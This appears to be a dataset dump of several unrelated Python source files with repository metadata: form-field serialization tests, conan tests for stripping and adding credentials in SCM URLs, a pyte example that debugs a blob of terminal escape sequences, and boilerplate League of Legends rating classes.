3c83d4698ecf6b5b59003d20cb26644e0dd77f61
|
[
"MIT"
] | 1
|
2020-05-21T10:01:07.000Z
|
2020-05-21T10:01:07.000Z
|
livestyled/models/tests/test_form_field.py
|
andrelopez/python-sdk
|
3c83d4698ecf6b5b59003d20cb26644e0dd77f61
|
[
"MIT"
] | 3
|
2021-02-01T10:13:36.000Z
|
2022-02-11T17:47:30.000Z
|
from livestyled.models.form_field import FormField
from livestyled.schemas.form_field import FormFieldSchema
def test_create_form_field_from_deserialized():
deserialized_data = {
'id': 47,
'type': 'radio',
'key': 'radio',
'validation_regex': 'Test',
'required': True,
'select_options': [
{
'id': 19,
'title': 'YES',
'value': 'YES',
'icon_url': 'https://cdn3.iconfinder.com/data/icons/flat-actions-icons-9/792/Tick_Mark_Dark-512.png'
},
{
'id': 20,
'title': 'NO',
'value': 'NO',
'icon_url': 'https://lh3.googleusercontent.com/proxy/fN1ayBfVrzPB8xZiqM5k38g6FkdY4EuSR3QuT2EBqwjyH7L8RqEXm4hc34k8E6FAdD5mbmHje0n_hIl6l5saUXH26Ak5b-gWo2iKBPbYTQ9HHlti'
}
],
'translations': [
{
'id': 12,
'language': 'en',
'label': 'RadioButton Label',
'placeholder': 'RadioButton Placeholder 2',
'validation_error': 'RadioButtonError2'
}
],
'sort_id': 2,
'auto_fill': None
}
form_field = FormField(**deserialized_data)
assert form_field
def test_serialize_form_field():
deserialized_data = {
'id': 47,
'type': 'radio',
'key': 'radio',
'validation_regex': 'Test',
'required': True,
'select_options': [
{
'id': 19,
'title': 'YES',
'value': 'YES',
'icon_url': 'https://cdn3.iconfinder.com/data/icons/flat-actions-icons-9/792/Tick_Mark_Dark-512.png'
},
{
'id': 20,
'title': 'NO',
'value': 'NO',
'icon_url': 'https://lh3.googleusercontent.com/proxy/fN1ayBfVrzPB8xZiqM5k38g6FkdY4EuSR3QuT2EBqwjyH7L8RqEXm4hc34k8E6FAdD5mbmHje0n_hIl6l5saUXH26Ak5b-gWo2iKBPbYTQ9HHlti'
}
],
'translations': [
{
'id': 12,
'language': 'en',
'label': 'RadioButton Label',
'placeholder': 'RadioButton Placeholder 2',
'validation_error': 'RadioButtonError2'
}
],
'sort_id': 2,
'auto_fill': None
}
form_field = FormField(**deserialized_data)
serialized_form_field = FormFieldSchema().dump(form_field)
assert serialized_form_field
| 32.666667
| 182
| 0.513736
| 202
| 2,548
| 6.272277
| 0.351485
| 0.071034
| 0.037885
| 0.031571
| 0.80663
| 0.80663
| 0.80663
| 0.80663
| 0.80663
| 0.80663
| 0
| 0.055249
| 0.360675
| 2,548
| 77
| 183
| 33.090909
| 0.722529
| 0
| 0
| 0.712329
| 0
| 0.027397
| 0.376766
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 1
| 0.027397
| false
| 0
| 0.027397
| 0
| 0.054795
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83b67496a84ccbe4055b8332e90d5ffc2a326b9a
| 17,120
|
py
|
Python
|
conans/test/unittests/client/tools/scm/test_scm_base.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 6,205
|
2015-12-01T13:40:05.000Z
|
2022-03-31T07:30:25.000Z
|
conans/test/unittests/client/tools/scm/test_scm_base.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 8,747
|
2015-12-01T16:28:48.000Z
|
2022-03-31T23:34:53.000Z
|
conans/test/unittests/client/tools/scm/test_scm_base.py
|
Mattlk13/conan
|
005fc53485557b0a570bb71670f2ca9c66082165
|
[
"MIT"
] | 961
|
2015-12-01T16:56:43.000Z
|
2022-03-31T13:50:52.000Z
|
# coding=utf-8
import unittest
from conans.client.tools.scm import SCMBase
from conans.errors import ConanException
class RemoveCredentialsTest(unittest.TestCase):
def test_http(self):
expected_url = 'https://myrepo.com/path/to/repo.git'
test_urls = ['https://myrepo.com/path/to/repo.git',
'https://username:password@myrepo.com/path/to/repo.git',
'https://username@myrepo.com/path/to/repo.git',
'https://gitlab-ci-token:1324@myrepo.com/path/to/repo.git',
]
for it in test_urls:
self.assertEqual(expected_url, SCMBase._remove_credentials_url(it))
def test_http_with_port_number(self):
self.assertEqual('https://myrepo.com:8000/path/to/repo.git',
SCMBase._remove_credentials_url(
'https://username@myrepo.com:8000/path/to/repo.git'))
def test_ssh(self):
# Here, for ssh, we don't want to remove the user ('git' in this example)
# URL-like syntax
self.assertEqual('ssh://git@github.com:2222/conan-io/conan.git',
SCMBase._remove_credentials_url(
'ssh://git@github.com:2222/conan-io/conan.git'))
# URL-like syntax with a password
self.assertEqual('ssh://git@github.com:2222/conan-io/conan.git',
SCMBase._remove_credentials_url(
'ssh://git:password@github.com:2222/conan-io/conan.git'))
self.assertEqual('ssh://github.com:2222/conan-io/conan.git',
SCMBase._remove_credentials_url(
'ssh://github.com:2222/conan-io/conan.git'))
# scp-like syntax
self.assertEqual('git@github.com:conan-io/conan.git',
SCMBase._remove_credentials_url(
'git@github.com:conan-io/conan.git'))
def test_local_unix(self):
self.assertEqual('file:///srv/git/project.git',
SCMBase._remove_credentials_url('file:///srv/git/project.git'))
self.assertEqual('file:///srv/git/PROJECT.git',
SCMBase._remove_credentials_url('file:///srv/git/PROJECT.git'))
def test_local_windows(self):
self.assertEqual('file:///c:/srv/git/PROJECT',
SCMBase._remove_credentials_url('file:///c:/srv/git/PROJECT'))
self.assertEqual('file:///C:/srv/git/PROJECT',
SCMBase._remove_credentials_url('file:///C:/srv/git/PROJECT'))
def test_svn_ssh(self):
self.assertEqual('svn+ssh://10.106.191.164/home/svn/shproject',
SCMBase._remove_credentials_url(
'svn+ssh://username:password@10.106.191.164/home/svn/shproject'))
class OutputMock(object):
def __init__(self):
self.out = list()
def warn(self, text):
self.out.append("WARN: " + text)
class GetUrlWithCredentialsTest(unittest.TestCase):
def test_url(self):
scm = SCMBase()
self.assertEqual('http://github.com/conan-io/conan.git',
scm.get_url_with_credentials("http://github.com/conan-io/conan.git"))
def test_url_username(self):
scm = SCMBase()
self.assertEqual('http://user@github.com/conan-io/conan.git',
scm.get_url_with_credentials("http://user@github.com/conan-io/conan.git"))
def test_url_password(self):
scm = SCMBase()
self.assertEqual('http://user:pass@github.com/conan-io/conan.git',
scm.get_url_with_credentials(
"http://user:pass@github.com/conan-io/conan.git"))
def test_url_with_user_param(self):
scm = SCMBase(username="user")
self.assertEqual('https://user@github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))
def test_url_with_password_param(self):
scm = SCMBase(password="pass")
self.assertEqual('https://github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))
def test_url_with_user_password_param(self):
scm = SCMBase(username="user", password="pass")
self.assertEqual('https://user:pass@github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))
def test_url_with_user_password_characters_param(self):
scm = SCMBase(username="el niño", password="la contra%seña")
self.assertEqual('https://el+ni%C3%B1o:la+contra%25se%C3%B1a@github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://github.com/conan-io/conan.git"))
def test_url_user_with_user_param(self):
output = OutputMock()
scm = SCMBase(username="user", output=output)
self.assertEqual('https://dani@github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://dani@github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_url_user_with_password_param(self):
scm = SCMBase(password="pass")
self.assertEqual('https://dani:pass@github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://dani@github.com/conan-io/conan.git"))
def test_url_user_with_user_password_param(self):
output = OutputMock()
scm = SCMBase(username="user", password="pass", output=output)
self.assertEqual('https://dani:pass@github.com/conan-io/conan.git',
scm.get_url_with_credentials("https://dani@github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_url_user_pass_with_user_param(self):
output = OutputMock()
scm = SCMBase(username="user", output=output)
self.assertEqual('http://dani:pass@github.com/conan-io/conan.git',
scm.get_url_with_credentials(
"http://dani:pass@github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_url_user_pass_with_password_param(self):
output = OutputMock()
scm = SCMBase(password="pass", output=output)
self.assertEqual('http://dani:secret@github.com/conan-io/conan.git',
scm.get_url_with_credentials(
"http://dani:secret@github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM password got from URL, ignoring 'password' parameter", output.out)
def test_url_user_pass_with_user_password_param(self):
output = OutputMock()
scm = SCMBase(username="user", password="pass", output=output)
self.assertEqual('http://dani:secret@github.com/conan-io/conan.git',
scm.get_url_with_credentials(
"http://dani:secret@github.com/conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
self.assertIn("WARN: SCM password got from URL, ignoring 'password' parameter", output.out)
def test_ssh(self):
scm = SCMBase()
self.assertEqual('ssh://github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))
def test_ssh_username_password(self):
output = OutputMock()
scm = SCMBase(username="dani", password="pass", output=output)
self.assertEqual('ssh://dani@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
def test_ssh_username(self):
scm = SCMBase(username="dani")
self.assertEqual('ssh://dani@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))
def test_ssh_password(self):
output = OutputMock()
scm = SCMBase(password="pass", output=output)
self.assertEqual('ssh://github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
def test_ssh_url_with_username_only_password(self):
output = OutputMock()
scm = SCMBase(password="pass", output=output)
self.assertEqual('ssh://dani@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://dani@github.com/conan-io/conan.git"))
self.assertEqual(1, len(output.out))
self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
def test_ssh_url_with_username_only_username(self):
output = OutputMock()
scm = SCMBase(username="dani", output=output)
self.assertEqual('ssh://git@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://git@github.com/conan-io/conan.git"))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_ssh_url_with_username_and_username_password(self):
output = OutputMock()
scm = SCMBase(password="pass", username="dani", output=output)
self.assertEqual('ssh://git@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://git@github.com/conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_ssh_url_with_username_password_and_only_password(self):
output = OutputMock()
scm = SCMBase(password="password", output=output)
self.assertEqual('ssh://git@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://git:pass@github.com/conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
self.assertIn("WARN: Password in URL cannot be set for 'ssh' SCM type, removing it",
output.out)
def test_ssh_url_with_username_password_and_only_username(self):
output = OutputMock()
scm = SCMBase(username="dani", output=output)
self.assertEqual('ssh://git@github.com/conan-io/conan.git',
scm.get_url_with_credentials("ssh://git:pass@github.com/conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
self.assertIn("WARN: Password in URL cannot be set for 'ssh' SCM type, removing it",
output.out)
def test_ssh_url_with_username_password_and_username_password(self):
output = OutputMock()
scm = SCMBase(password="password", username="dani", output=output)
self.assertEqual("ssh://git@github.com/conan-io/conan.git",
scm.get_url_with_credentials("ssh://git:pass@github.com/conan-io/conan.git"))
self.assertEqual(3, len(output.out))
self.assertIn("WARN: SCM password cannot be set for ssh url, ignoring parameter", output.out)
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
self.assertIn("WARN: Password in URL cannot be set for 'ssh' SCM type, removing it",
output.out)
def test_scp(self):
scm = SCMBase()
self.assertEqual('git@github.com/conan-io/conan.git',
scm.get_url_with_credentials("git@github.com/conan-io/conan.git"))
def test_scp_only_password(self):
output = OutputMock()
scm = SCMBase(password="pass", output=output)
self.assertEqual("git@github.com:conan-io/conan.git",
scm.get_url_with_credentials("git@github.com:conan-io/conan.git"))
self.assertIn("WARN: SCM password cannot be set for scp url, ignoring parameter", output.out)
def test_scp_only_username(self):
output = OutputMock()
scm = SCMBase(username="dani", output=output)
self.assertEqual('git@github.com:conan-io/conan.git',
scm.get_url_with_credentials("git@github.com:conan-io/conan.git"))
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_scp_username_password(self):
output = OutputMock()
scm = SCMBase(password="pass", username="dani", output=output)
self.assertEqual("git@github.com:conan-io/conan.git",
scm.get_url_with_credentials("git@github.com:conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM password cannot be set for scp url, ignoring parameter", output.out)
self.assertIn("WARN: SCM username got from URL, ignoring 'username' parameter", output.out)
def test_scp_url_username_password(self):
output = OutputMock()
scm = SCMBase(password="password", output=output)
self.assertEqual('git:pass@github.com:conan-io/conan.git',
scm.get_url_with_credentials("git:pass@github.com:conan-io/conan.git"))
self.assertIn("WARN: URL type not supported, ignoring 'username' and 'password' "
"parameters", output.out)
def test_file_url(self):
scm = SCMBase()
self.assertEqual("file://path/to/.git", scm.get_url_with_credentials("file://path/to/.git"))
def test_file_url_with_username_password_params(self):
output = OutputMock()
scm = SCMBase(username="user", password="pass", output=output)
self.assertEqual('file://path/to/.git', scm.get_url_with_credentials("file://path/to/.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM username cannot be set for file url, ignoring parameter",
output.out)
self.assertIn("WARN: SCM password cannot be set for file url, ignoring parameter",
output.out)
def test_git(self):
scm = SCMBase()
self.assertEqual('git://github.com/conan-io/conan.git',
scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
def test_git_only_password(self):
output = OutputMock()
scm = SCMBase(password="pass", output=output)
self.assertEqual("git://github.com/conan-io/conan.git",
scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)
def test_git_only_username(self):
output = OutputMock()
scm = SCMBase(username="dani", output=output)
self.assertEqual("git://github.com/conan-io/conan.git",
scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
self.assertIn("WARN: SCM username cannot be set for git url, ignoring parameter", output.out)
def test_git_username_password(self):
output = OutputMock()
scm = SCMBase(password="pass", username="dani", output=output)
self.assertEqual("git://github.com/conan-io/conan.git",
scm.get_url_with_credentials("git://github.com/conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)
self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)
def test_git_url_username_password(self):
output = OutputMock()
scm = SCMBase(password="pass", output=output)
self.assertEqual("git://github.com/conan-io/conan.git",
scm.get_url_with_credentials(
"git://user:pass@github.com/conan-io/conan.git"))
self.assertEqual(2, len(output.out))
self.assertIn("WARN: SCM password cannot be set for git url, ignoring parameter", output.out)
self.assertIn("WARN: Username/Password in URL cannot be set for 'git' SCM type, removing it",
output.out)
| 52.195122
| 102
| 0.632886
| 2,194
| 17,120
| 4.799909
| 0.056062
| 0.063242
| 0.084322
| 0.105403
| 0.905707
| 0.896781
| 0.878549
| 0.844364
| 0.829741
| 0.799449
| 0
| 0.006174
| 0.233703
| 17,120
| 327
| 103
| 52.35474
| 0.796555
| 0.008645
| 0
| 0.592593
| 0
| 0.011111
| 0.347106
| 0.125074
| 0
| 0
| 0
| 0
| 0.348148
| 1
| 0.159259
| false
| 0.292593
| 0.011111
| 0
| 0.181481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
83bf87709775b9491340477ec7f030ca39d9e5b7
| 4,983
|
py
|
Python
|
windows/win32/pyte-0.4.8/examples/debug.py
|
mytliulei/DCNRobotInstallPackages
|
224a7d3dec715c8990bd35b7a390b387afd03bc4
|
[
"Apache-2.0"
] | null | null | null |
windows/win32/pyte-0.4.8/examples/debug.py
|
mytliulei/DCNRobotInstallPackages
|
224a7d3dec715c8990bd35b7a390b387afd03bc4
|
[
"Apache-2.0"
] | null | null | null |
windows/win32/pyte-0.4.8/examples/debug.py
|
mytliulei/DCNRobotInstallPackages
|
224a7d3dec715c8990bd35b7a390b387afd03bc4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
debug
~~~~~
... what if I need to debug a bunch of escape sequences? Just use
:class:`~pyte.streams.DebugStream` instead of the usual
:class:`~pyte.streams.Stream`. Note though, that it requires
:func:`bytes` as input.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
from __future__ import print_function, unicode_literals
import sys
sys.path.append("..")
import pyte
# A blob of `ADOM` output we need to debug. Hey! I know this is ugly ...
blob = b"""\x1b[25d\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[23;15H\x1b[37m\x1b[40mSt:28 Le: 1 Wi: 8 Dx:12 To:31 Ch: 3 Ap: 5 Ma: 9 Pe:11 C\x08\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[5d\x08\x08\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[5;75H\x1b[33m\x1b[40m.\x1b[6d\x08\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[7;73H^\x1b[8d\x1b[0;10m\x1b[33m\x1b[40m.\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;75H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[5;72H\x1b[0;10;1m\x1b[37m\x1b[40m^\x1b[6d\x08^\x1b[30m\x1b[40m^@\x1b[0;10m\x1b[33m\x1b[40m.\x1b[7;72H\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[8d\x1b[0;10m\x1b[33m\x1b[40m..\x1b[0;10;1m\x1b[37m\x1b[40m^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mYou\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mneed\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mspecial\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mequipment\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mto\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mscale\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mthose\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mmountains.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mYou\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mneed\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mspecial\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mequipment\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mto\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mscale\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mthose\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mmountains.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[6;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[6;74H\x1b[33m\x1b[40m.\x1b[7d\x08\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[8;72H\x1b[0;10m\x1b[33m\x1b[40m.\x1b[9d\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[37m\x1b[40m^^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[7;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mYou\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mneed\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mspecial\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mequipment\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mto\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mscale\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mthose\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mmountains.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[7;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[7;74H\x1b[33m\x1b[40m.\x1b[8d\x08\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[9;72H\x1b[0;10m\x1b[33m\x1b[40m~\x1b[10d\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[8;74H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[7;71H\x1b[0;10;1m\x1b[30m\x1b[40m^\x1b[8d\x08\x1b[0;10m\x1b[33m\x1b[40m..\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[0;10m\x1b[33m\x1b[40m.\x1b[9;71H.\x1b[10d\x1b[32m\x1b[40m&\x1b[0;10;1m\x1b[30m\x1b[40m^^\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[8;73H\x1b[?25h\x1b[?0c\x1b[?25l\x1b[?1c\x1b[H\x1b[K\x1b[2d\x1b[A\x1b[37m\x1b[40mA\x1b[6;71H\x1b[0;10;1m\x1b[37m\x1b[40m^\x1b[7d\x08\x08\x1b[30m\x1b[40m^\x1b[8d\x08^\x1b[0;10m\x1b[33m\x1b[40m.\x1b[0;10;1m\x1b[30m\x1b[40m@\x1b[0;10m\x1b[33m\x1b[40m.\x1b[9;70H.\x1b[10d\x1b[32m\x1b[40m&\x1b[H\x1b[C\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[C\x1b[37m\x1b[40mroad.\x1b[0;10m\x1b[39;49m\x1b[37m\x1b[40m\x1b[24;78H\x1b[8;72H\x1b[?25h\x1b[?0c"""
if __name__ == "__main__":
stream = pyte.DebugStream()
screen = pyte.Screen(80, 24)
stream.attach(screen)
stream.feed(blob)
| 160.741935
| 4,267
| 0.707606
| 1,208
| 4,983
| 2.907285
| 0.113411
| 0.134966
| 0.202449
| 0.133827
| 0.838269
| 0.833713
| 0.817198
| 0.807232
| 0.807232
| 0.774203
| 0
| 0.305261
| 0.034919
| 4,983
| 30
| 4,268
| 166.1
| 0.425036
| 0.085089
| 0
| 0
| 0
| 0.1
| 0.943559
| 0.92873
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.3
| 0
| 0.3
| 0.1
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
83d758be43f090a4ac18b2de134434fe27cd7e1a
| 6,821
|
py
|
Python
|
loldib/getratings/models/NA/na_katarina/na_katarina_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_katarina/na_katarina_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_katarina/na_katarina_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Katarina_Jng_Aatrox(Ratings):
pass
class NA_Katarina_Jng_Ahri(Ratings):
pass
class NA_Katarina_Jng_Akali(Ratings):
pass
class NA_Katarina_Jng_Alistar(Ratings):
pass
class NA_Katarina_Jng_Amumu(Ratings):
pass
class NA_Katarina_Jng_Anivia(Ratings):
pass
class NA_Katarina_Jng_Annie(Ratings):
pass
class NA_Katarina_Jng_Ashe(Ratings):
pass
class NA_Katarina_Jng_AurelionSol(Ratings):
pass
class NA_Katarina_Jng_Azir(Ratings):
pass
class NA_Katarina_Jng_Bard(Ratings):
pass
class NA_Katarina_Jng_Blitzcrank(Ratings):
pass
class NA_Katarina_Jng_Brand(Ratings):
pass
class NA_Katarina_Jng_Braum(Ratings):
pass
class NA_Katarina_Jng_Caitlyn(Ratings):
pass
class NA_Katarina_Jng_Camille(Ratings):
pass
class NA_Katarina_Jng_Cassiopeia(Ratings):
pass
class NA_Katarina_Jng_Chogath(Ratings):
pass
class NA_Katarina_Jng_Corki(Ratings):
pass
class NA_Katarina_Jng_Darius(Ratings):
pass
class NA_Katarina_Jng_Diana(Ratings):
pass
class NA_Katarina_Jng_Draven(Ratings):
pass
class NA_Katarina_Jng_DrMundo(Ratings):
pass
class NA_Katarina_Jng_Ekko(Ratings):
pass
class NA_Katarina_Jng_Elise(Ratings):
pass
class NA_Katarina_Jng_Evelynn(Ratings):
pass
class NA_Katarina_Jng_Ezreal(Ratings):
pass
class NA_Katarina_Jng_Fiddlesticks(Ratings):
pass
class NA_Katarina_Jng_Fiora(Ratings):
pass
class NA_Katarina_Jng_Fizz(Ratings):
pass
class NA_Katarina_Jng_Galio(Ratings):
pass
class NA_Katarina_Jng_Gangplank(Ratings):
pass
class NA_Katarina_Jng_Garen(Ratings):
pass
class NA_Katarina_Jng_Gnar(Ratings):
pass
class NA_Katarina_Jng_Gragas(Ratings):
pass
class NA_Katarina_Jng_Graves(Ratings):
pass
class NA_Katarina_Jng_Hecarim(Ratings):
pass
class NA_Katarina_Jng_Heimerdinger(Ratings):
pass
class NA_Katarina_Jng_Illaoi(Ratings):
pass
class NA_Katarina_Jng_Irelia(Ratings):
pass
class NA_Katarina_Jng_Ivern(Ratings):
pass
class NA_Katarina_Jng_Janna(Ratings):
pass
class NA_Katarina_Jng_JarvanIV(Ratings):
pass
class NA_Katarina_Jng_Jax(Ratings):
pass
class NA_Katarina_Jng_Jayce(Ratings):
pass
class NA_Katarina_Jng_Jhin(Ratings):
pass
class NA_Katarina_Jng_Jinx(Ratings):
pass
class NA_Katarina_Jng_Kalista(Ratings):
pass
